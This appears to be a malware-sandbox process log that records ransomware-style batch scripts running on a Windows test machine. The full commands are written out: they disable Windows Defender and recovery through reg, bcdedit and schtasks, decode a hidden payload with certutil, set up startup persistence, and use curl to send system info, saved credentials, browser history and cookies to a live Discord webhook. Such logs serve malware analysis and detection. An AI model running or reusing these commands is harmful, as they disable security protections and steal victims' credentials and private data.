C:\Users\Admin\AppData\Local\Temp\Temp1_AESCrypt_v310_x64.zip\AESCrypt_v310_x64\setup.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_AESCrypt_v310_x64.zip\AESCrypt_v310_x64\setup.exe"1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --field-trial-handle=8636,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=8580 /prefetch:81⤵
-
C:\Windows\System32\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\Temp1_AESCrypt_v310_x64.zip\AESCrypt_v310_x64\AESCrypt.msi"1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 1FD7E1E5820E1DCB16FDB0378C688C4C C2⤵
- Loads dropped DLL
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding B288974E1180889D9C56BB2F54441B6A2⤵
- Loads dropped DLL
-
C:\Windows\System32\MsiExec.exe"C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\AESCrypt\AESCrypt.dll"2⤵
- Loads dropped DLL
- Registers COM server for autorun
- Modifies registry class
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --field-trial-handle=7744,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=6348 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --field-trial-handle=6112,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=7988 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --field-trial-handle=8952,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=6296 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=8152,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=8172 /prefetch:81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=9068,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=9028 /prefetch:81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=9068,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=9028 /prefetch:81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --field-trial-handle=9044,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=6148 /prefetch:11⤵
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Importan.txt1⤵
- Opens file in notepad (likely ransom note)
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --field-trial-handle=6192,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=8708 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --field-trial-handle=6132,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=6204 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --field-trial-handle=7264,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=8116 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --field-trial-handle=6256,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=8984 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --field-trial-handle=6224,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=5532 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --field-trial-handle=5500,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=9176 /prefetch:11⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\dashost.exedashost.exe {892eebe8-fbf9-4a59-bfade6e5b8c45671}2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Ransomware.bat" "1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mode.commode con:cols=50 lines=22⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c mshta.exe "C:\Users\Admin\Desktop\Ransomware.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exemshta.exe "C:\Users\Admin\Desktop\Ransomware.bat"3⤵
- Blocklisted process makes network request
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Importan - Copy (2).txt1⤵
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\f94adfb48dd849a5808cc7ae465bcddf /t 5124 /p 41961⤵
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Importan - Copy (2).txt1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --field-trial-handle=5492,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=9160 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --field-trial-handle=5516,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=7604 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --field-trial-handle=9168,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=5624 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --field-trial-handle=7912,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=6292 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --field-trial-handle=8700,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=5264 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=55 --field-trial-handle=8080,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=5520 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6476,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=7548 /prefetch:81⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\batch-somware.bat" "1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\Desktop\batch-somware.bat""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c type3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\batch-somware.bat" "1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\Desktop\batch-somware.bat""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c type3⤵
-
C:\Windows\System32\NOTEPAD.EXE"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\batch-somware.bat1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=57 --field-trial-handle=8296,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=8992 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=58 --field-trial-handle=9164,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=6196 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6140,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=7936 /prefetch:81⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\HCRYPT_v1.2.0_stable.bat" "1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp 650012⤵
-
C:\Windows\system32\fsutil.exefsutil dirty query C:2⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\vbscript.vbs"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\HCRYPT_v1.2.0_stable.bat" "3⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp 650014⤵
-
C:\Windows\system32\fsutil.exefsutil dirty query C:4⤵
-
C:\Windows\system32\msg.exemsg * ⚠️ File failed to run correctly (Process aborted)4⤵
-
C:\Windows\system32\cmd.execmd /c exit 1154⤵
-
C:\Windows\system32\attrib.exeAttrib +h +s +r "C:\Users\Admin\Desktop\HCRYPT_v1.2.0_stable.bat"4⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set recoveryenabled No4⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exebcdedit /set bootstatuspolicy ignoreallfailures4⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.Update" /v "Enabled" /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f4⤵
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable4⤵
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable4⤵
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable4⤵
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable4⤵
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies security service
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\Sense" /v "Start" /t REG_DWORD /d "4" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f4⤵
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /IM chrome.exe4⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /F /IM taskmgr.exe4⤵
- Kills process with taskkill
-
C:\Windows\system32\timeout.exetimeout 2 /nobreak4⤵
-
C:\Windows\system32\certutil.execertutil -decode cmd.txt "C:\Users\Admin/3D Objects/65657421881128013.cmd"4⤵
-
C:\Windows\system32\timeout.exetimeout 2 /nobreak4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin/3D Objects/65657421881128013.cmd"4⤵
-
C:\Windows\system32\cscript.execscript CS2.vbs4⤵
- Drops startup file
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7540126521735912913.lnk"4⤵
- Drops startup file
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c 2>NUL ping -4 -n 1 GYLQWJCN | findstr [4⤵
-
C:\Windows\system32\PING.EXEping -4 -n 1 GYLQWJCN5⤵
- Runs ping.exe
-
C:\Windows\system32\findstr.exefindstr [5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell Invoke-RestMethod api.ipify.org4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-RestMethod api.ipify.org5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\curl.execurl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```[ 1. Report from Admin - 10.127.0.105 @ 12:31:46.33 ] \nBatch process started...```\"}" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```[ Version info from Admin - 10.127.0.105 @ 12:31:46.91 ] \n Version - 1.2.0 (MADE BY GHOST.exe)```\"}" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\systeminfo.exeSystemInfo4⤵
- Gathers system information
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F systeminfo=@"C:\Users\Admin\AppData\Roaming\sysinfo.txt" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\tasklist.exetasklist4⤵
- Enumerates processes with tasklist
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F tasks=@"C:\Users\Admin\AppData\Roaming\tasklist.txt" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\net.exenet user4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user5⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F tasks=@"C:\Users\Admin\AppData\Roaming\netuser.txt" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\quser.exequser4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F tasks=@"C:\Users\Admin\AppData\Roaming\quser.txt" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\reg.exereg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run4⤵
- Modifies registry key
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F tasks=@"C:\Users\Admin\AppData\Roaming\stup.txt" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\cmdkey.execmdkey /list4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F tasks=@"C:\Users\Admin\AppData\Roaming\cmdkey.txt" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\ipconfig.exeipconfig /all4⤵
- Gathers network information
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F tasks=@"C:\Users\Admin\AppData\Roaming\ipconfig.txt" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- MICROSOFT EDGE // from Admin - 10.127.0.105 @ 12:31:53.70```\"}" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F hstry=@"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F tasks=@"Cookies" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F tasks=@"Cookies-journal" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
